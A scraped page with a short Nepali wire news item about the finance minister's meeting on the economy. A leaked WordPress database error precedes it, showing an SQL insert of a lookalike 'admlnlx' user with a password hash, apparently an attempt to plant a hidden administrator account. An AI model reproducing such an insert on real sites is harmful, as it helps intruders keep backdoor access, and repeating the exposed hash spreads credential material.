WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B24z/nbnFp/ovBQV5oRObkVDF73Zd50', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 02:20:32', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २७ –
मुलुकको वर्तमान आर्थिक अवस्थाबारे उपप्रधानमन्त्री तथा अर्थमन्त्री कृष्णबहादुर महराले अर्थ र राजस्व सचिवका साथै केन्द्रीय बैंकका गभर्नरसँग सामूहिक छलफल गर्नुभएको छ ।
अर्थ मन्त्रालयमा आज भएको छलफलमा पुँजीगत खर्च वृद्धि, राष्ट्रिय गौरवका आयोजनालाई रकमको अभाव हुन नदिने, वित्तबजारमा देखिएको तरलता अभाव, राजस्व सङ्कलनको लक्ष्य प्राप्ति, राजस्व चुहावट नियन्त्रणलगायत विषयमा छलफल भएको थियो ।
उपप्रधानमन्त्री महरालाई देशको पछिल्लो आर्थिक अवस्थाबारे अर्थ सचिव शान्तराज सुवेदी, राजस्व सचिव राजन खनाल र नेपाल राष्ट्र बैंकका गभर्नर चिरञ्जीवी नेपालले आफूमातहतका निकायबाट बजेट कार्यान्वयन, मौद्रिक नीतिको प्रभावकारिता, राजस्वका लक्ष्य र चुनौतीका साथै हालसम्मका प्रगतिबारे जानकारी गराउनुभएको थियो । – रासस